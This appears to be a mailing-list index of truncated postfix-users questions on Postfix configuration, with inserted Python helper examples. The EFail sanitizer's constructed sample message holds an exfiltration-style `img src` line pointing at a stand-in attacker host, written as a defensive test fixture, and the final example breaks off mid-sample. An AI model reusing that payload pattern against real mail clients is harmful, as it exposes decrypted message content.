Need Help Configuring Postfix Restrictions

Hi, I have installed postfix 2.11.3 on Debian jessie. Everything works fine. I would like to restrict local users from sending mails to a particular group email id and allow only a few users, with smtpd_restriction_classes and smtpd_recipient_restrictions, following this link, which is not working. All the users are still able to send mails to the group id. I have the same restriction working fine with postfix 2.9 installed on wheezy.

fatal: no SASL authentication mechanisms please help!

Trying to set up SASL, postfix 2.7, dovecot 1.29. The following is in mail.log:
fatal: no SASL authentication mechanisms
warning: deliver_request_get: error receiving common attributes
warning: unexpected end-of-input from dovecot socket while reading input attribute name
warning: process /usr/lib/postfix/smtpd pid 20380 exit status 1
myorigin = /etc/mailname
queue_directory = /var/spool/postfix/

biff = no

# appending .domain is the MUA's job.
append_dot_mydomain = no

# Uncomment the next line to generate "delayed mail" warnings
#delay_warning_time = 4h

submission rate limit advice

I've tightened, or rather overtightened, several postfix limits, in what
seemed like a good idea at the time...

I noticed this warning now; this user is on a dynamic IP, so I can't add
his IP to an exception:

Going by the counter "Connection rate limit exceeded: 125", what values
should I alter?

Jan 31 14:01:09 geko postfix/smtpd[24223]: warning: Connection rate limit
exceeded: 124 from[] for
service submission
Jan 31 14:03:14 geko postfix/smtpd[24340]: warning: Connection rate limit
exceeded: 125 from[

How to autoreply with "Undelivered Mail Returned to Sender" unknown user for


Let's say that I do have a user "user" on my system, but I would like
for emails sent to "user+ ... at domain dot org" to bounce back the
"Undelivered mail" message with something like:

<user+ ... at domain dot org>: unknown user: "user+doesnotexist"

How would I do this? I naively tried adding

user+doesnotexist: doesnoteixst

to my /etc/aliases file, but it was still delivered to my user account.

Thanks for any help.


Disable SSL/TLS renegotiation

Hello postfix-users,

While checking the SSL configuration of a Postfix server, I noticed that
so-called "Client-initiated secure renegotiation" is available in Postfix
by default. You can verify it with the following openssl command and press
"R" once the connection is successfully established:

openssl s_client -connect <hostname/IP>:25 -starttls smtp

250 DSN
depth=2 C = US, O = XXX, OU = <a href="" title=""></a>, CN = XXX Root CA
verify return:1
depth=1 C = US, O = XXX, OU = <a href="" title=""></a>, CN = XXX Server CA
verify return:1
depth=0 C = XX, ST = XXX, L = XXX, O = XX, CN = XXX
verify return:

check_client_access not blocking /8 /16 /24 etc.

I'm curious to know what I've done wrong with my client checks file.

I can reject a specific IP but it won't reject when I use net blocks...

STARTTLS / DANE difficulties?

We are migrating our Postfix MX services and in the process have
disrupted a setup which has been very stable for the past couple of

Trouble Postfix ClamSMTP - Help


I have now been troubleshooting my problem with ClamSMTP and Postfix for 2 days; after writing to the ClamAV mailing list, the people there are not helping and I am standing still.

Setting per user/domain smtpd_recipient_limit

Is it possible to set smtpd_recipient_limit via maps?

We have multiple domains and the need to remove such a limitation on a domain or user basis.


Making relay_access_denied permanent?


I was wondering why the following error is returned as tempfail:

Jul  8 09:49:03 mx3 postfix-cluster/smtpd[3420]: connect from[]
Jul  8 09:49:03 mx3 postfix-cluster/smtpd[3420]: NOQUEUE: reject: RCPT
from[]: 454 4.7.1
< ... at gmail dot com>: Relay access denied;
from=< ... at jpkessler dot de> to=< ... at gmail dot com> proto=ESMTP
Jul  8 09:49:03 mx3 postfix-cluster/smtpd[3420]: lost connection after
RCPT from[

FreeBSD-11 (Jail) Saslauthd rimap authentication fails

I seem to have a configuration issue with respect to sender
authentication. On the Postfix-3.3.0 host I can do this:

[root@mx32 ~]# testsaslauthd -u testuser -p testuser-password  # expires 20180703
0: OK "Success."

However, when I try to send an email through this Postfix service from
a remote Squirrelmail instance using that same username and password
it fails saslauth in postfix:

[root@mx32 ~]# grep 'Jul 3 12:57:' /var/log/maillog
. .

Long-running cron job emails appearing in queue with large delay value


When a long-running (24hr) cron job runs with log output sent to STDOUT,
it's emailed in the standard way but the resulting email appears in the
queue with a delay value of ~86000 seconds. Our monitoring system,
depending on timing, occasionally spots these and raises an alert about
a potential delivery issue.

Is there any way of tweaking postfix so that it starts the clock only
once the sendmail/postdrop process has received the entire mail from the
cron job?


Server side S/MIME EFail (partial) Mitigation


I carefully read the technical paper about the exfiltration attack (EFail) on decrypted S/MIME or PGP content.


According to my understanding, sanitizing text/html content to a certain extent in the mail body should mitigate the attack.
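The sanitizing step described above, as an added example that is not from the post and not Postfix's own code. EFail's direct-exfiltration wrapper puts the encrypted part between two text/html halves of one tag, typically an unclosed `<img src="http://attacker/`, so that the decrypted plaintext becomes the tail of a URL the mail client fetches. The example rewrites remote references in every text/html part of a message (without requiring a closing quote) and leaves every other part alone, so signatures over the encrypted or plain parts still verify. The sample message and hostnames are constructed; deploying this as a Postfix content filter is an assumption about the setup, and the coverage is partial (CSS @import, meta refresh and other fetch triggers are not handled).

```python
import re
import email
from email import policy
from email.message import EmailMessage

# HTML attributes whose value a mail client fetches when rendering.  The
# closing quote is deliberately NOT required: the EFail wrapper leaves
# <img src="http://attacker/ open so the decrypted part becomes the URL tail.
_REMOTE_ATTR = re.compile(
    r'(?<![\w-])(src|href|background|action|poster|data)'
    r'(\s*=\s*["\']?\s*(?:https?:)?//)',
    re.IGNORECASE,
)
# CSS url(...) references in <style> blocks or style="" attributes.
_REMOTE_CSS_URL = re.compile(r'(url\(\s*["\']?\s*)(?:https?:)?//', re.IGNORECASE)


def neutralize_remote_refs(html: str) -> tuple[str, int]:
    """Return (rewritten html, number of references neutralized).
    Attributes are renamed to data-blocked-<name>, so the tag structure
    survives but nothing is fetched; CSS urls are pointed at about:blank.
    mailto:, cid: and relative references are left untouched."""
    out, n_attr = _REMOTE_ATTR.subn(r'data-blocked-\g<1>\g<2>', html)
    out, n_css = _REMOTE_CSS_URL.subn(r'\g<1>about:blank#', out)
    return out, n_attr + n_css


def sanitize_message(raw: str) -> EmailMessage:
    """Parse a message and rewrite every text/html part in place.  Other
    parts, including an encrypted application/pkcs7-mime or PGP body, are
    not modified."""
    msg = email.message_from_string(raw, policy=policy.default)
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        cleaned, n = neutralize_remote_refs(part.get_content())
        if n:
            part.set_content(cleaned, subtype="html")  # re-encodes the part
    return msg


def html_parts(msg: EmailMessage) -> list[str]:
    """Decoded bodies of all text/html parts, in message order."""
    return [p.get_content() for p in msg.walk() if p.get_content_type() == "text/html"]


# Constructed sample, not a real capture: the two HTML halves of one <img>
# tag surround a text/plain part that stands in for the encrypted part.
SAMPLE_RAW = """\
From: attacker@example.invalid
To: victim@example.invalid
Subject: constructed EFail-style wrapper
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; charset="utf-8"

<img src="http://attacker.example/exfil?
--b1
Content-Type: text/plain; charset="utf-8"

hello
--b1
Content-Type: text/html; charset="utf-8"

">
--b1--
"""

if __name__ == "__main__":
    for body in html_parts(sanitize_message(SAMPLE_RAW)):
        print(repr(body))
```

Run on the sample, the first half becomes `<img data-blocked-src="http://attacker.example/exfil?`, so even after the client concatenates the decrypted text into the attribute value, no request is made.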

smtp_address_preference default


According to [1], since 2.8 postfix uses ipv6 as the default for
smtp_address_preference. But as stated in the doc, it is unsafe when only
IPv6 connectivity is broken, so the safe variant would be any.

Wouldn't it be an alternative if smtp_address_preference could be set
to "ipv6, ipv4" or "ipv4, ipv6" instead of any?

Kind regards


may not be appropriate question but figured what the hay... -- Dovecot

Hi, based on the commands below, does anyone know why I would get these errors?

Jun 29 12:05:02 mail2 dovecot: imap-login: Login: user=<cec-support-comment>, method=PLAIN, rip=, lip=, mpid=6752, TLS
Jun 29 12:05:02 mail2 dovecot: imap(cec-support-comment): Error: user cec-support-comment: Initialization failed: Initializing mail storage from mail_location setting failed: mkdir(/home/cec_support_comment/mail) failed: Permission denied (euid=593(cec-support-comment) egid=594(cec-support-comment) missing +w perm: /home, euid is not dir owner)

Back story, user wanted names to h

RE: Can postfix send encrypted but not authenticated emails ? -- FIXED

Hi, I only needed to add one setting and all the deferred test emails on O365 started flowing into my inbox.

RAN vi /etc/postfix/
# -ALF 2018-06-28
smtpd_tls_security_level = may
RAN service postfix reload

Case closed, thanks.


ITS Service Manager:
Spam and Virus Prevention
Mass Mailing
G Suite/Gmail

 ... at uconn dot edu
University of Connecticut,  ITS, SSG, Server Systems

Reject unknown users, even when sent from 'mydomain'

I have a LAN behind a firewall with port 25 forwarded to a machine running postfix. That machine sends email on to a Domino server. However, I am using a VM for testing and I cannot change the forwarded port. So I am doing it all from the postfix machine. I use the command below to send an email to an unknown user (from the command line). But it delivers it to Domino anyway. I have only one user defined in the /etc/postfix/aliases file. Do I have the right configuration to reject unknown users?

Defer mail instead of bounce

I have email relays that relay/filter email between the internet and our
internal network. I must use the DNS servers we maintain and those
servers use a DNS blacklisting service. The problem I'm having is that
when a legitimate domain is blacklisted, I see log messages like the
ones below and the email is bounced. In the situation that brought this
up, both the sender and recipient domain were blocked so the bounce went
nowhere. Since these blacklistings are temporary, maybe several hours,
I'd like to defer this mail and have postfix try again later.

Can postfix send encrypted but not authenticated emails ?

Hi, I have been reading the online docs for TLS_README.html and SASL_README.html but am still having trouble deducing whether I can get Postfix 2.6 to accept email over port 587 without giving Postfix a username and password.

My current understanding of how my server deals with mail is traffic on port 25 with no username and password needed is only allowed from on-campus, and traffic on ports 465 and 587 is allowed when you provide a username and password, and postfix encrypts the email.

I would like to change it so postfix will accept email without a username and password, specifically from Offic

Can an ISP partially block traffic over port 25?


I have a very strange issue with a mail server located in the main
company office. For the last five weeks we have been experiencing
problems delivering emails to some domains stored on and
other servers.

how to restrict subnets to send only to specific domains


I have to set up Postfix so that clients or printers from subnets like or specific IP addresses like are allowed to
send mails to every destination.

I have done this by this

smtpd_relay_restrictions = permit_mynetworks, permit_sasl_authenticated,
mynetworks = [::ffff:]/104 [::1]/128

In the txt file are the specific mail addresses.

Now I have to restrict some subnets to send mails only to domains like or

I found


Hi all,

I was reading Postfix documentation and found this configuration parameter.

disable_vrfy_command (default: no)
Disable the SMTP VRFY command. This stops some techniques used to harvest email addresses.

I am not a native English speaker, so I am a bit confused by the sentence above. So, if the value is set to 'no', it stops some techniques used to harvest email addresses. Is that correct? The parameter itself has "disable" in its name, so it looks like a double negative.

Sorry for this silly question but I would really appreciate it if anyone could help me.

error when attempting to send a message


I'm running Postfix 3.3.1 with rspamd as an anti-spam solution.

Header has unknown for IP address


I don’t believe my Postfix install is doing the PTR lookups, or it broke in some way.

I have this enabled:
# postconf |grep smtpd_peername_lookup
smtpd_peername_lookup = yes

and my DNS can resolve the name:
# host domain name pointer

But the headers give unknown:
Received: from (unknown [])
by (Postfix) with ESMTPS id BA9143C
for < ... at example dot com>; Wed, 27 Jun 2018 15:48:44 +0000 (UTC)

How could I debug/enable this? What was missed in the config.

Many thanks, S.
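The post shows `host` returning a PTR record while Postfix still logs the client as `unknown`. smtpd(8) only uses the PTR name when it is forward-confirmed: the name must resolve (A/AAAA) back to the connecting address. A missing PTR, a forward lookup that fails, or a forward lookup that returns other addresses all produce `unknown` in the log and in the Received: header, even with smtpd_peername_lookup = yes. The following added example (not from the post, not Postfix code) emulates that decision against constructed resolver data; the names and addresses are invented, and a live case is checked by substituting the answers of `dig -x <ip>` and `dig A <name>`.

```python
import ipaddress

# Constructed resolver answers standing in for DNS; none of these names or
# addresses are real.  PTR: ip -> name.  A: name -> list of addresses.
FAKE_PTR = {
    "198.51.100.10": "mx.good.example",    # name resolves back to the address
    "198.51.100.11": "mx.lying.example",   # PTR exists, but A points elsewhere
    "198.51.100.13": "mx.multi.example",   # round-robin A set that includes it
    # 198.51.100.12 deliberately has no PTR at all
}
FAKE_A = {
    "mx.good.example": ["198.51.100.10"],
    "mx.lying.example": ["203.0.113.5"],
    "mx.multi.example": ["203.0.113.7", "198.51.100.13"],
}


def postfix_client_name(ip, ptr_records=FAKE_PTR, addr_records=FAKE_A):
    """Hostname smtpd(8) writes into logs and Received: headers for a client.
    The PTR name is used only if it resolves forward to the connecting
    address (forward-confirmed reverse DNS); a missing PTR, or a PTR whose
    forward lookup does not contain the address, both give 'unknown'."""
    ipaddress.ip_address(ip)  # reject garbage before any lookup
    name = ptr_records.get(ip)
    if name is None or ip not in addr_records.get(name, ()):
        return "unknown"
    return name


def explain(ip, ptr_records=FAKE_PTR, addr_records=FAKE_A):
    """Reason string for an 'unknown' entry, mirroring the two checks above."""
    name = ptr_records.get(ip)
    if name is None:
        return f"{ip}: no PTR record"
    forward = addr_records.get(name, ())
    if ip not in forward:
        return (f"{ip}: PTR {name} resolves to {', '.join(forward) or 'nothing'}, "
                f"not back to {ip}")
    return f"{ip}: forward-confirmed as {name}"


if __name__ == "__main__":
    for ip in ("198.51.100.10", "198.51.100.11", "198.51.100.12", "198.51.100.13"):
        print(postfix_client_name(ip).ljust(18), explain(ip))
```

The second case is the one that trips people up: reverse DNS "works" as far as `host <ip>` is concerned, but the name does not point back, so Postfix treats it as unverified. A resolver that is unreachable from the smtpd process (for example a chrooted smtpd without a working resolv.conf) gives the same `unknown` result for every client.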

Need to understand mynetworks_style more

In our live system, I have firewall forwarding port 25 to mail server.
That mail server then delivers mail to Domino server.

I am testing on a VM, and I have this much configured and working within
our LAN.

I am unclear as to delivery restrictions. The default for
mynetworks_style is subnet, so email will be accepted from any machine on
Does this restrict email coming in from internet? Since I can't test with
live system, I can't forward port 25 to VM for testing.

My goal:
I am migrating from Sendmail.

What is postfix telling me to do?

I am configuring a new Postfix-3.3.0 service to act as one of our
public MX providers. The address of this new MX service has been
published in our DNS but with a lower precedence (higher priority
number) than our active MX service.

Naturally enough there are countless spam bots regularly hitting the
low priority MX services and so when I activate Postfix for testing we
get numerous opportunistic connections.

New EFF certbot plugin for Postfix

The EFF announced a certbot plugin for Postfix today, which
is still in beta. A couple of things to keep in mind:

* If you've already deployed DANE, this stands a good chance
of breaking your DANE TLSA records. For the moment do not
deploy this if you have inbound DANE.

* Do consider sharing any substantive experience (issues you
had to resolve that may save others grief).

unable to get smtpd_recipient_restrictions to work

I have set up postfix using virtualmin on ubuntu 16.04
Have setup DKIM, MX, SPF etc
For webmail have setup roundcube and rainloop.
SSL is setup using let's encrypt.
Everything works great for emails.

Now we need to restrict some users to be able to send local emails only.
For this I found this and followed the steps for "Restricting what users
can send mail to off-site".

I have tried all options and searched all options online but none of it
seems to work for this.

Here's content from my file


Blocking TLDs with check_sender_access


I have a check_sender_access restriction that blocks many TLDs like
.red and .space. Problem is that we have one legitimate .red customer
(what was he thinking?) that needs to send us mail.

performance question


for a period of time we need to route ~ 2.000 mail addresses to our old
I would add those addresses into the transport file like

 ... at domain dot com
 ... at domain dot com

Will the larger transport file now affect the performance of the Postfix
server ?

Best place for DNSBL restrictions


I manage a small mail server and have been using Spamcop as a DNSBL via postscreen:

postscreen_dnsbl_sites =
postscreen_dnsbl_action = drop

After reading RFC 5782 “DNS Blacklists and Whitelists”, I decided to add some more
DNSBL’s and specify filters and weighting. While looking at various samples of
using DNSBL’s, I came back to an old question - where should I implement DNSBL restrictions ?

On this list I seem to recall that using a DNSBL via postscreen is discouraged.

postfix, header rewriting, DKIM


upon receiving an email with:

< ... at example dot int>

- notice the missing space after the comma - sendmail passes the
unmodified header to milters, e.g.

Specific recipient restrictions

Hi list,

I have a few users who use a metered mobile connection and I need them to
have a restriction on monthly volume used and on each message's size,
different from my normal recipients. E.g. normal users can send or receive
up to 10MB messages, but for them I need to have a much lower restriction.
Is it possible to achieve this through some add-on?

I would appreciate any direction to look at.

thanks in advance


comma in Display Name


We have a voicemail system that emails the voice messages to the
users. It uses the Caller ID info in the Display Name area of the

A problem occurs when the Caller ID contains a comma which causes the
recipients email server to see the post with multiple from addresses
and some servers (Google's for one) bounce such posts.

Instead of a header such as that, we now receive:

I've requested the phone techs double quote the Display Name area, ie:

How to pass connection's real IP through Nginx smtp proxy to Postfix/postscreen backend?

I run Postfix 3.3.1 & Nginx 1.15.0

Both work great.

I'm beginning to experiment with putting Postfix (and eventually other) servers behind Nginx (v 1.15.0) set up as a mail (SMTP) proxy.

Without the proxy, Postfix logs show an inbound connection to my real IP

Jun 21 12:12:31 mailprox postfix/postscreen[55634]: CONNECT from []:43757 to []:25

The way nginx gets configured for smtp proxy, even if I'm *NOT* doing any auth is to direct the connection to a "fake" auth_http destination,

mail {
http {

5 messages per second


I would like to send 5 messages per second with postfix.

How can I do that with postfix ?



Multiple Virtual Domains


I have a new domain on my server and I want certain accounts to
be sent out with the new domain, rather than the default. I have it
set up at the moment so that any domain that you try to send through
gets rewritten to the default, but I'd like this new
domain to be allowed through.

I'm sure this has been asked a few times. It just seems this mailing
list is not well indexed by search engines any longer.


postfix-3.4-20180619 updated connection reuse

postfix-3.4-20180619 fixes today's segfault in the connection reuse
logic. I have been unable to reproduce the problem on my own systems
so I'll depend on other people for confirmation.


Redirect all email to an external address


I'm trying to create a postfix master process listening on port 2525 and
redirect all email sent through this port to an external address.

I created a regexp table "/etc/postfix/canonical-redirect-test" to map any
address to the external address I want; a test query with postmap returns
the expected address.

/^.+@.+$/     ... at example dot com

I added a new process in /etc/postfix/

:2525 inet n     -       n       -       -   smtpd
    -o canonical_maps=regexp:/etc/postfix/canonical-redirect-test
    -o virtual_alias_maps=regexp:/etc/postfix/canonical-redirect-test

I also try other setti

available: multiple deliveries per TLS-encrypted connection

Postfix snapshot 20180617, released a few minutes ago, introduces
Postfix SMTP client support for multiple deliveries per TLS-encrypted
connection. This is not to be confused with closing a connection
and reusing some TLS state in a new connection.

Below is a fragment from the RELEASE_NOTES file.


Major changes with snapshot 20180617

Preliminary Postfix SMTP client support for multiple deliveries per
TLS-encrypted connection.

Feedback on Tutorial

Hello Postfix users,

I made a relatively comprehensive tutorial[1] on how to set up a mail server
(Postfix, Dovecot, Rspamd, ...) and integrate it with Nextcloud. My goal was to
create an all-in-one, step-by-step tutorial from beginning to end.

I partly used other tutorials as a basis, but also did a lot of research and

Postfix-3.3.0_1 Can't assign requested address

I am setting up a new mail hub in a FreeBSD-11.1 jail.

Update to recommended TLS settings

In 2015, Viktor wrote an email detailing the current recommended TLS

Now that we are three years later, are these still the best settings? Is
there something better we can be recommending?

If anything, I think that 'smtp_tls_security_level = may' should be
recommended (it actually should be *default*), but I'm wondering about
the other recommended ciphers/protocols/excludes etc. as well.


masquerade_domains map?

Hello Postfix users,

while "masquerade_exceptions" supports "type:table" patterns,
"masquerade_domains" supports only a static list of domain names in

For me, it would be useful to also manage these domains in a file,
mysql, tcp or ldap... It would be nice if a future release of Postfix
could support "type:table" on "masquerade_domains".

Thank you very much

spamming mailbox ?

I checked the mail queue and the logs, and this time I found something
strange. I used the command "grep -r "" /var/log/mail.log" and the
result is in the attached .txt file. If I understand properly, there are many
tries to send from  ... at s1 dot to
 ... at emailemailemail dot com, but nothing happens
later because of a failing connection to on port 25.

policy daemon protocol quoted sender localpart


I'm implementing a policy daemon and I realized
the sender attribute value of the Postfix
policy delegation protocol does not preserve the
quotes of the original envelope address.
If Postfix accepts a mail address I think it
should pass this address to the policy daemon without
modifying it.


To make sure I accept only mail addresses which
can be handled later on by my tools I would
like to do my own check if the address is valid.

Example (Postfix 3.2.4):

Sender address
"AAA ... at AAA dot AAA"@AAA.AAA
is passed by postfix to the policy daemon as:
sender=AAA ... at AAA dot ... at AAA dot AAA
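The exchange described in this post, as an added example that is not from the post and not Postfix's own code: a minimal policy service for the Postfix policy delegation protocol. A request is a series of `name=value` lines ended by an empty line; the reply is `action=...` followed by an empty line. Because the sender arrives with RFC 5321 quoting removed, the daemon splits on the last `@` to recover the domain and then checks the localpart itself. Rejecting senders whose localpart is not a plain dot-atom is this example's own policy choice (an assumption about what "can be handled later on by my tools" means), and the listening port is arbitrary.

```python
import re
import socketserver

# RFC 5322 atext: a localpart made only of these characters and dots needs
# no quoting, so any downstream tool can handle it.
_ATEXT = r"[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]"
_DOT_ATOM = re.compile(rf"{_ATEXT}+(?:\.{_ATEXT}+)*")


def parse_policy_request(blob: str) -> dict[str, str]:
    """Parse one policy delegation request: "name=value" lines terminated
    by an empty line.  Values may contain '=', so split on the first one."""
    attrs: dict[str, str] = {}
    for line in blob.splitlines():
        if line == "":
            break
        name, sep, value = line.partition("=")
        if not sep:
            raise ValueError(f"malformed policy attribute line: {line!r}")
        attrs[name] = value
    return attrs


def sender_localpart_is_safe(sender: str) -> bool:
    """Postfix passes the envelope sender with its quoting removed, so a
    quoted localpart such as "a@b"@example.com arrives as a@b@example.com.
    Split on the LAST '@' to recover the domain, then accept only localparts
    that are plain dot-atoms.  The null sender (bounces) is always accepted."""
    if sender == "":
        return True
    localpart, _, _domain = sender.rpartition("@")
    return _DOT_ATOM.fullmatch(localpart) is not None


def policy_action(attrs: dict[str, str]) -> str:
    """Decide one request.  DUNNO hands over to the next Postfix restriction.
    Rejecting non-dot-atom senders is this example's policy (assumption)."""
    if not sender_localpart_is_safe(attrs.get("sender", "")):
        return "REJECT 5.1.7 Sender address syntax not supported here"
    return "DUNNO"


def format_response(action: str) -> str:
    """A reply is one action= attribute followed by an empty line."""
    return f"action={action}\n\n"


class PolicyHandler(socketserver.StreamRequestHandler):
    """TCP policy service; Postfix would reach it via
    check_policy_service inet:127.0.0.1:10040 (the port is an assumption).
    Postfix may send several requests over one connection."""

    def handle(self) -> None:
        while True:
            lines = []
            for raw in self.rfile:
                line = raw.decode("utf-8", "replace").rstrip("\r\n")
                if line == "":
                    break
                lines.append(line)
            else:
                return  # peer closed the connection
            attrs = parse_policy_request("\n".join(lines) + "\n\n")
            self.wfile.write(format_response(policy_action(attrs)).encode())
            self.wfile.flush()


# Constructed request, shaped like what smtpd(8) sends at RCPT time, with
# the unquoted sender from the post.
SAMPLE_REQUEST = (
    "request=smtpd_access_policy\nprotocol_state=RCPT\nprotocol_name=ESMTP\n"
    "client_address=192.0.2.1\nsender=AAA@AAA.AAA@AAA.AAA\n"
    "recipient=user@example.com\n\n"
)

if __name__ == "__main__":
    print(format_response(policy_action(parse_policy_request(SAMPLE_REQUEST))), end="")
    with socketserver.TCPServer(("127.0.0.1", 10040), PolicyHandler) as srv:
        srv.serve_forever()
```

Because the quotes are already gone when the daemon sees the address, a localpart that legitimately contained `@` is indistinguishable from a malformed one; the check above treats both the same way, which is the trade-off the post is pointing at.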

3.4-20180605-nonprod tlsproxy permissions

Using postfix 3.4-20180605-nonprod as a gateway to an internal
server, with a tls policy of "secure".

3.4-20180605-nonprod has been running *without* connection reuse for
a couple days error-free.

When I set smtp_tls_connection_reuse=yes, I get:

Jun 13 10:53:29 mgate3 postfix/tlsproxy[93495]: warning: cannot get
RSA certificate from file "/var/certs/cert-20180314.pem": disabling
TLS support
Jun 13 10:53:29 mgate3 postfix/tlsproxy[93495]: warning: TLS library
problem: error:0200100D:system library:fopen:Permission
Jun 13 10:53:

exclude specific external IP from postfix blacklists

I have a problem with a specific IP. People from the network behind
this address can't connect to the mailserver because, as I found out, this
IP address is listed. Not exactly this specific address, but the whole class C.
I saw Postfix uses blacklists in its own configuration, but I would like to
exclude only this one IP.

Guidelines for headers in original message


What are the general guidelines for headers and their values that are shown
in the original message of an email? I'm particularly interested in the
'Received from: foo by bar'. Do people generally append the actual
servernames along with their IP addresses for all the hops? Or, do they
make the mails come out from a common relay server.

Also, if it's fine to make mails come from a common relay, is it a bad idea
to set $myhostname to foo.relay for all the mails from foo domain, instead
of showing all the hops? I've seen people put this as $myorigin.

gmail blocking 6to4 ipv6 addresses

Does gmail universally block 6to4 addresses, or is there something else I
am doing wrong?

Jun 07 23:32:14 postfix/smtp[19358]: 0695A2409C: to=<
... at gmail dot com>, orig_to=< ... at git dot icu>, relay=[2607:f8b0:400d:c08::1b]:25, delay=1.6,
delays=0.12/0.07/0.84/0.56, dsn=5.7.1, status=bounced (host[2607:f8b0:400d:c08::1b] said: 550-5.7.1
[2002:c62e:c6c6::1] Our system has detected that this message does not
550-5.7.1 meet IPv6 sending guidelines regarding PTR records and
authentication 550-5.7.1 .

sender_bcc_maps which use reply_to header ?

Hi !

I have a case I want to solve: a mail is sent from  ... at example dot com with
reply_to defined to  ... at example dot com.
I want to automatically BCC to  ... at example dot com if reply_to is defined to
 ... at example dot com.

sender_bcc_maps use "from" header, I want same with reply_to header.
It seems this doesn't exist.

What's the best solution to achieve this ?
Content filter ?


local mail submission sendmail fails when loopback is down

Hello all,

TL;DR: `sendmail <address>` fails with `sendmail: fatal: could not find
any active network interfaces` if loopback interface is not up. Is this
expected behaviour?


I know applications can expect the loopback interface to be available.
However, strictly speaking, sendmail when invoked for local mail
submission shouldn't attempt to access the network, all it has to do is
drop the file into the maildrop directory.

reject_sender_login_mismatch exception


I have all users in an LDAP database and store users' aliases, virtuals,
canonicals, forwards etc as attributes. For that purpose using the
`reject_sender_login_mismatch' seems to be a simple and powerful
solution for increasing security and I'm using it. Excluding some e-mail
addresses from this restriction if necessary is not a problem. The
problem is:
I'd like to allow sending mail from some certain hosts as some certain
users without SASL authentication.

Valid examples for mynetworks file

Good day,

I am working on a migration from an IBM Domino SMTP server to Postfix. In
Domino we had SMTP_allow documents with IP addresses of systems allowed to
send mails via this server.

Standard IP addresses are fine, so I add them like: OK

As far as I understand, are *names* like allowed in the
mynetworks file?
So this would be OK: OK

What about wildcards *? Would that also be OK, or do I need to translate it
into CIDR?

192.168.*.* OK
192.168.50.* OK

Thank you,
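mynetworks takes network addresses or network/netmask (CIDR) patterns, optionally read from a file or a lookup table; it has no wildcard syntax. The following is an added example, not from the post and not Postfix code, that translates Domino-style patterns like the ones shown into CIDR and refuses anything without an exact equivalent (an inner wildcard, a host name, a catch-all that would turn the server into an open relay) so those entries get looked at by hand. The sample inputs are invented.

```python
import ipaddress


def wildcard_to_cidr(entry: str) -> str:
    """Translate an IPv4 pattern ("192.168.*.*", "192.168.50.*", "10.1.2.3")
    into the network/prefix form mynetworks accepts.  Only trailing
    wildcards have an exact CIDR equivalent; anything else raises."""
    octets = entry.strip().split(".")
    if len(octets) != 4:
        raise ValueError(f"{entry!r}: not a dotted quad (host names are not accepted)")
    fixed: list[str] = []
    for octet in octets:
        if octet == "*":
            break
        if not octet.isdigit() or int(octet) > 255:
            raise ValueError(f"{entry!r}: bad octet {octet!r}")
        fixed.append(octet)
    if any(o != "*" for o in octets[len(fixed):]):
        raise ValueError(f"{entry!r}: wildcards must be trailing, no CIDR equivalent")
    if not fixed:
        raise ValueError(f"{entry!r}: would match every client (open relay)")
    network = ".".join(fixed + ["0"] * (4 - len(fixed))) + f"/{8 * len(fixed)}"
    # strict=True: host bits are all zero by construction, so this cannot fail
    return str(ipaddress.ip_network(network, strict=True))


def convert_entries(entries: list[str]) -> tuple[list[str], list[str]]:
    """Convert a whole list; returns (CIDR lines for the mynetworks file,
    human-readable reasons for every input that was refused)."""
    accepted: list[str] = []
    refused: list[str] = []
    for entry in entries:
        try:
            accepted.append(wildcard_to_cidr(entry))
        except ValueError as exc:
            refused.append(str(exc))
    return accepted, refused


if __name__ == "__main__":
    # Invented sample list in the Domino style from the post.
    sample = ["192.168.*.*", "192.168.50.*", "10.1.2.3", "192.*.50.*", "mail.example.com"]
    ok, bad = convert_entries(sample)
    print("\n".join(ok))
    for reason in bad:
        print("# refused:", reason)
```

The accepted lines can go one per line into a file referenced as `mynetworks = /etc/postfix/mynetworks`; a name such as mail.example.com has to be resolved to its address(es) first, and the result should be a specific /32, not a broader block.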

not adding message-id


I have an issue with a message-id being automatically added when not present.

Postfix mail system:
postfix 25 (content-filter) --> AV 10026 --> postfix 10025

Summary of the problem:
When a message arrives at the postfix mail system, if it is not present, a message-id is added by the second postfix MTA (10025) while "always_add_missing_headers" is set to "no".
Note that this second MTA listens to the loopback interface (see below).

Jun 5 16:51:37 rhel62-agu-fe1 postfix/smtpd[3063]: C51FD40092: client=unknown[]
Jun 5 16:51:46 rhel62-agu-fe1 postfix/cleanup[3067]: C51F


I am trying to track a single email throughout the entire postfix process.
The idea is that when a customer calls us and says that a certain email
never reached them, we can quickly trace the email through the logs and see
that it died due to RBL, virus threshold, etc.

Ideally, I'd like to be able to get or set a unique message ID and then be
able to match that ID in the logfiles to see what the outcome of a specific
email was. Is there a way to trace a single email through everything
postfix does to it?
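Postfix logs every accepted message under a queue id: cleanup(8) logs the Message-ID, qmgr(8) the sender and size, and each delivery agent logs the recipient, relay and status. A message that passes through a content filter gets a second queue id when it is re-injected, linked to the first by the "queued as" text in the first hop's status line, and mail rejected at SMTP time never gets a queue id at all (NOQUEUE), so it can only be found by envelope address. The following added example (not from the post, not Postfix code) follows those links over a constructed log excerpt; all host names, ids and addresses in it are made up.

```python
import re
from collections import defaultdict

# Constructed sample log: one message relayed to a content filter on 10026
# and re-injected (two queue ids), one DNSBL reject with no queue id, and an
# unrelated message.  Names, ids and addresses are invented.
SAMPLE_LOG = """\
Jun  5 16:51:37 mx postfix/smtpd[3063]: C51FD40092: client=mail.example.net[192.0.2.10]
Jun  5 16:51:37 mx postfix/cleanup[3067]: C51FD40092: message-id=<abc123@example.net>
Jun  5 16:51:37 mx postfix/qmgr[1234]: C51FD40092: from=<alice@example.net>, size=2048, nrcpt=1 (queue active)
Jun  5 16:51:38 mx postfix/smtp[3070]: C51FD40092: to=<bob@example.com>, relay=127.0.0.1[127.0.0.1]:10026, delay=0.5, delays=0.1/0/0.1/0.3, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as D7A2E40093)
Jun  5 16:51:38 mx postfix/qmgr[1234]: C51FD40092: removed
Jun  5 16:51:38 mx postfix/smtpd[3080]: D7A2E40093: client=localhost[127.0.0.1]
Jun  5 16:51:38 mx postfix/cleanup[3081]: D7A2E40093: message-id=<abc123@example.net>
Jun  5 16:51:38 mx postfix/qmgr[1234]: D7A2E40093: from=<alice@example.net>, size=2100, nrcpt=1 (queue active)
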